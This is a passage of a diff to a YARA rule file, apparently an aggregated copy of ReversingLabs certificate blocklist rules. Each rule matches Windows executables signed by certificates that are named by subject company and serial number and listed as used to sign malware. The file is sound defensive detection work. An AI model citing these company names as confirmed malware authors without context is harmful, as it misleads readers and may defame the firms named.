pe.signatures[i].serial=="b1:da:21:96:88:e5:1f:d0:bf:ac:2c:89:1d:56:cb:b8") and 1542931200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_119Acead668Bad57A48B4F42F294F8F0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_7289B0F9Bd641E3E352Dc3183F8De6Be : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7ec33498-b299-58e0-be42-9e4fb9549e28" + id = "dc8a745f-7150-57b7-9ddc-e5a1721d8c02" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9076-L9092" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "61c49c60fc4fd5d654a6376fcee43e986a5351f085a5652a3c8888774557e053" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3082-L3098" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "42b068e85b3aff5e6dd5ec4979f546dc5338ebf8719d86c0641ffb8353959af9" score = 75 quality = 90 tags = "INFO, FILE" @@ -12937,22 +32728,22 @@ rule REVERSINGLABS_Cert_Blocklist_119Acead668Bad57A48B4F42F294F8F0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PB03 TRANSPORT LTD." and pe.signatures[i].serial=="11:9a:ce:ad:66:8b:ad:57:a4:8b:4f:42:f2:94:f8:f0" and 1619654400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ICE ACTIVATION LIMITED" and pe.signatures[i].serial=="72:89:b0:f9:bd:64:1e:3e:35:2d:c3:18:3f:8d:e6:be" and 1557933274<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7A6D30A6Eb2Fa0C3369283725704Ac4C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Fd7B7A8678A67181A54Bc7499Eba44Da : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b7830a3a-ddcc-54ef-84dd-5d4b13863f90" + id = "d6456cb6-e950-54be-a7f4-5c1d622c6aab" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9094-L9110" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "788abb53ed7974d87c1b1bdbe31dcd3e852ea64745d94780d78d1217ee0206fe" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3100-L3118" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f1e26ea26890043be2c8b9c35ba2e6758b60fe173f00bf4c77cc5289ce0d5600" score = 75 quality = 90 tags = "INFO, FILE" @@ -12962,22 +32753,22 @@ rule REVERSINGLABS_Cert_Blocklist_7A6D30A6Eb2Fa0C3369283725704Ac4C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Trade By International ApS" and pe.signatures[i].serial=="7a:6d:30:a6:eb:2f:a0:c3:36:92:83:72:57:04:ac:4c" and 1619568000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IMRAN IT SERVICES LTD" and (pe.signatures[i].serial=="00:fd:7b:7a:86:78:a6:71:81:a5:4b:c7:49:9e:ba:44:da" or pe.signatures[i].serial=="fd:7b:7a:86:78:a6:71:81:a5:4b:c7:49:9e:ba:44:da") and 1548028800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_670C3494206B9F0C18714Fdcffaaa42F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ebbdd6Cdeda40Ca64513280Ecd625C54 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "210a0c72-7eb7-5c78-bf5b-1ac292e7fa11" + id = "2cf769dc-5108-5f18-a51e-e152180a2b66" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9112-L9128" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3b1e244b5f543a05beb2475020aa20dfc723f4dce3a5a0a963db1672d3295721" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3120-L3138" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1d419f2fe2a9bf744bdde48adc50e0bc48746f1576f96570385a2a1c9ba92d21" score = 75 quality = 90 tags = "INFO, FILE" @@ -12987,22 +32778,22 @@ rule REVERSINGLABS_Cert_Blocklist_670C3494206B9F0C18714Fdcffaaa42F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ADRIATIK PORT SERVIS, d.o.o." and pe.signatures[i].serial=="67:0c:34:94:20:6b:9f:0c:18:71:4f:dc:ff:aa:a4:2f" and 1622160000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IT PUT LIMITED" and (pe.signatures[i].serial=="00:eb:bd:d6:cd:ed:a4:0c:a6:45:13:28:0e:cd:62:5c:54" or pe.signatures[i].serial=="eb:bd:d6:cd:ed:a4:0c:a6:45:13:28:0e:cd:62:5c:54") and 1549238400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0E8Aa328Af207Ce8Bcae1Dc15C626188 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_61Da676C1Dcfcf188276E2C70D68082E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9718f290-6ecd-5d67-9013-af99f98fffef" + id = "d974b740-38fa-564d-b4c6-8955568a4e77" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9130-L9146" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4022abb8efbda944e35ff529c5b3b3c9f6370127a945f3eec1310149bb5d06e4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3140-L3156" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4f8af4a5c9812e6559218e387e32bc02cb0adcd40d9d4963fefc929f6101ae9a" score = 75 quality = 90 tags = "INFO, FILE" @@ -13012,22 +32803,22 @@ rule REVERSINGLABS_Cert_Blocklist_0E8Aa328Af207Ce8Bcae1Dc15C626188 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PRO SAT SRL" and pe.signatures[i].serial=="0e:8a:a3:28:af:20:7c:e8:bc:ae:1d:c1:5c:62:61:88" and 1627344000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "P2N ONLINE LTD" and pe.signatures[i].serial=="61:da:67:6c:1d:cf:cf:18:82:76:e2:c7:0d:68:08:2e" and 1552723954<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Cfad6Be1D823B4Eacb803B720F525A7D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_767436921B2698Bd18400A24B01341B6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "844e295f-b22f-5eb0-9f98-0d6e574d2954" + id = "3e3b2b75-9416-5c4f-ad47-88f92039f532" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9148-L9166" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d8005774e6011d8198039a6588834cd0b13dd728103b63c3ea8b6e0dc3878f05" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3158-L3174" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "759bbbc5929463ad68d5dcd28b30401b9ff680f522172ed8d5d7dd3772e07587" score = 75 quality = 90 tags = "INFO, FILE" @@ -13037,22 +32828,22 @@ rule REVERSINGLABS_Cert_Blocklist_Cfad6Be1D823B4Eacb803B720F525A7D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sistema LLC" and (pe.signatures[i].serial=="00:cf:ad:6b:e1:d8:23:b4:ea:cb:80:3b:72:0f:52:5a:7d" or pe.signatures[i].serial=="cf:ad:6b:e1:d8:23:b4:ea:cb:80:3b:72:0f:52:5a:7d") and 1627430400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "REBROSE LEISURE LIMITED" and pe.signatures[i].serial=="76:74:36:92:1b:26:98:bd:18:40:0a:24:b0:13:41:b6" and 1556284480<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_7Ebcb54B7E0E6410B28610De0743D4Dd : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_3E795531B3265510F935187Eca59920A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "84140bbd-23a0-5355-9d1a-918cc93c3352" + id = "953434f4-cc19-5a0a-923b-4deaadacef00" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9168-L9184" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "c9444ff9e13192bf300afac12554bc4cc2defb37bb5b57906b6163db378c515a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3176-L3192" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d597e88314f9f20283b40058dd74167d0d72f7518277a57f26c15e44b670b386" score = 75 quality = 90 tags = "INFO, FILE" @@ -13062,22 +32853,22 @@ rule REVERSINGLABS_Cert_Blocklist_7Ebcb54B7E0E6410B28610De0743D4Dd : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SIA \"MWorx\"" and pe.signatures[i].serial=="7e:bc:b5:4b:7e:0e:64:10:b2:86:10:de:07:43:d4:dd" and 1625616000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "sasha catering ltd" and pe.signatures[i].serial=="3e:79:55:31:b3:26:55:10:f9:35:18:7e:ca:59:92:0a" and 1557243644<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_01106Cc293772Ca905A2B6Eff02Bf0F5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_8F40B1485309A064A28B96Bfa3F55F36 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1ec81090-91a1-5019-be91-14f60d6722fc" + id = "bad5b57e-185a-5872-9817-a7d688e24fe7" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9186-L9202" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "81e19c06de4546a2cee974230ef7aa15291f20f2e6b6f89c9b12107c26836b5e" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3194-L3212" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "58dd47bfd2acd698bc27fb03eb51e4b8598ef6c71f7193e3cc4eea63982855f0" score = 75 quality = 90 tags = "INFO, FILE" @@ -13087,22 +32878,22 @@ rule REVERSINGLABS_Cert_Blocklist_01106Cc293772Ca905A2B6Eff02Bf0F5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DMR Consulting Ltd." and pe.signatures[i].serial=="01:10:6c:c2:93:77:2c:a9:05:a2:b6:ef:f0:2b:f0:f5" and 1627084800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Singh Agile Content Design Limited" and (pe.signatures[i].serial=="00:8f:40:b1:48:53:09:a0:64:a2:8b:96:bf:a3:f5:5f:36" or pe.signatures[i].serial=="8f:40:b1:48:53:09:a0:64:a2:8b:96:bf:a3:f5:5f:36") and 1542585600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_05Bb162F6Efe852B7Bd4712Fd737A61E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B2120Facadbb92Cc0A176759604C6A0F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "82b2198e-140a-54d0-afa8-ad89980c7899" + id = "8a90cc61-4d39-58eb-a102-c22d096d99ae" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9204-L9220" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d2fcbce0826c1478338827376d2c7869e5b38dc6d5e737a2f986600c6f71b1e6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3214-L3232" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "08462b1bd3d45824aeea901a4db19365c28d8b8b0f594657df7a59250111729b" score = 75 quality = 90 tags = "INFO, FILE" @@ -13112,22 +32903,22 @@ rule REVERSINGLABS_Cert_Blocklist_05Bb162F6Efe852B7Bd4712Fd737A61E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Wellpro Impact Solutions Oy" and pe.signatures[i].serial=="05:bb:16:2f:6e:fe:85:2b:7b:d4:71:2f:d7:37:a6:1e" and 1628726400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SLON LTD" and (pe.signatures[i].serial=="00:b2:12:0f:ac:ad:bb:92:cc:0a:17:67:59:60:4c:6a:0f" or pe.signatures[i].serial=="b2:12:0f:ac:ad:bb:92:cc:0a:17:67:59:60:4c:6a:0f") and 1554249600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6171990Ba1C8E71049Ebb296A35Bd160 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4F407Eb50803845Cc43937823E1344C0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f81697ca-e49a-5a3d-9e0f-6192159e098b" + id = "6989cda1-f28e-58b7-8572-a7dc2e84d9e3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9222-L9238" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e922bb850b7c5c70db80e6a2b99310eac48d3b10b94a7259899facd681916bfa" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3234-L3250" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4d5a2b0619be902d8a437f204ae1b87222c73d3186930809b1f694bad429aea8" score = 75 quality = 90 tags = "INFO, FILE" @@ -13137,22 +32928,22 @@ rule REVERSINGLABS_Cert_Blocklist_6171990Ba1C8E71049Ebb296A35Bd160 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OWLNET LIMITED" and pe.signatures[i].serial=="61:71:99:0b:a1:c8:e7:10:49:eb:b2:96:a3:5b:d1:60" and 1620000000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SLOW COOKED VENTURES LTD" and pe.signatures[i].serial=="4f:40:7e:b5:08:03:84:5c:c4:39:37:82:3e:13:44:c0" and 1556555362<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2114Ca3Bd2Afd63D7Fa29D744992B043 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_6922Bb5De88E4127E1Ac6969E6A199F5 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7d112cb8-a29f-5560-9c3c-cd8891623d96" + id = "86e16068-8b0b-5f0f-af5e-5ee9f518a915" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9240-L9256" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "241fe5a9f233fa36a665d22b38fd360bee21bc9832c15ac9c9d9b17adc3bb306" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3252-L3268" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "39dbaa232ea9125934b3682d780e3821d12e771f2b844d027d99a432fe249d9f" score = 75 quality = 90 tags = "INFO, FILE" @@ -13162,22 +32953,22 @@ rule REVERSINGLABS_Cert_Blocklist_2114Ca3Bd2Afd63D7Fa29D744992B043 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MATCH CONSULTANTS LTD" and pe.signatures[i].serial=="21:14:ca:3b:d2:af:d6:3d:7f:a2:9d:74:49:92:b0:43" and 1625097600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SMACHNA PLITKA, TOV" and pe.signatures[i].serial=="69:22:bb:5d:e8:8e:41:27:e1:ac:69:69:e6:a1:99:f5" and 1552692162<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_6Aaa62208A3A78Bfac1443007D031E61 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_73065Efa163B7901Fa1Ccb0A54E80540 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "dd6dca76-ff5b-51a8-9318-20a88eb44ffb" + id = "949f55a9-7aa0-50de-bb81-fed5d27c3d24" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9258-L9274" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7ba7f69514230fe636efc0a12fb9ac489a5a80ca1f5bcdb050dd30ee8f69659c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3270-L3286" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e420c37c04aa676c266a4c2c228063239815c173a83c39d426c5a674648f1934" score = 75 quality = 90 tags = "INFO, FILE" @@ -13187,22 +32978,22 @@ rule REVERSINGLABS_Cert_Blocklist_6Aaa62208A3A78Bfac1443007D031E61 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Solar LLC" and pe.signatures[i].serial=="6a:aa:62:20:8a:3a:78:bf:ac:14:43:00:7d:03:1e:61" and 1608163200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SOVA CONSULTANCY LTD" and pe.signatures[i].serial=="73:06:5e:fa:16:3b:79:01:fa:1c:cb:0a:54:e8:05:40" and 1548115200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_09450B8F73Ea43E39D2Cdd56049Dbe40 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4842Afad00904Ed8C98811E652Ccb3B7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e6914a29-f6f7-56fc-8606-95666d31cf33" + id = "f09723aa-85a6-5d96-a71e-94f0e0a0f23c" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9276-L9292" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "22b344b8befc00b0154d225603c81c6058399770f54cb6a09d0f7908c5c8188c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3288-L3304" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2b5c7c13369c7b89f1ea5474de3644a12bf6412cb3fa8ade5b66de280fb10cbf" score = 75 quality = 90 tags = "INFO, FILE" @@ -13212,22 +33003,22 @@ rule REVERSINGLABS_Cert_Blocklist_09450B8F73Ea43E39D2Cdd56049Dbe40 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE4\\xB9\\x9D\\xE6\\xB1\\x9F\\xE5\\xAE\\x8F\\xE5\\x9B\\xBE\\xE6\\x97\\xA0\\xE5\\xBF\\xA7\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="09:45:0b:8f:73:ea:43:e3:9d:2c:dd:56:04:9d:be:40" and 1561602110<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\"VERY EXCLUSIVE LTD\"" and pe.signatures[i].serial=="48:42:af:ad:00:90:4e:d8:c9:88:11:e6:52:cc:b3:b7" and 1545177600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Efd9Bd4B4281C6522D96011Df46C9C4 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5A59A686B4A904D0Fca07153Ea6Db6Cc : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7bd6616b-fef7-56aa-a78a-606601afa4f3" + id = "018e511f-191d-5fd4-8ab0-0e5bbff44d58" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9294-L9310" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8f8a5e3457c05c5e70e33041c5b0b971cf8f19313d47055fd760ed17d94c8794" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3306-L3322" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7597b2ba870ec58ac0786a97fb92956406fe019c81f6176cc1a581988d3a9632" score = 75 quality = 90 tags = "INFO, FILE" @@ -13237,22 +33028,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Efd9Bd4B4281C6522D96011Df46C9C4 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE9\\x9B\\xB7\\xE7\\xA5\\x9E\\xEF\\xBC\\x88\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xEF\\xBC\\x89\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="0e:fd:9b:d4:b4:28:1c:65:22:d9:60:11:df:46:c9:c4" and 1586249095<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ABADAN PIZZA LTD" and pe.signatures[i].serial=="5a:59:a6:86:b4:a9:04:d0:fc:a0:71:53:ea:6d:b6:cc" and 1563403380<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Dd7D4A785990584D8C0837659173272 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0B6D8152F4A06Ba781C6677Eea5Ab74B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d5e3d85b-cc4e-5522-8558-f2703c38c4e6" + id = "dacac5fe-00dc-5080-a725-9ef69473c45e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9312-L9328" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d18a479f07f2bdb890437e2bcb0213abdfb0eb684cdaf17c5eb0583039f2edb4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3324-L3340" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = 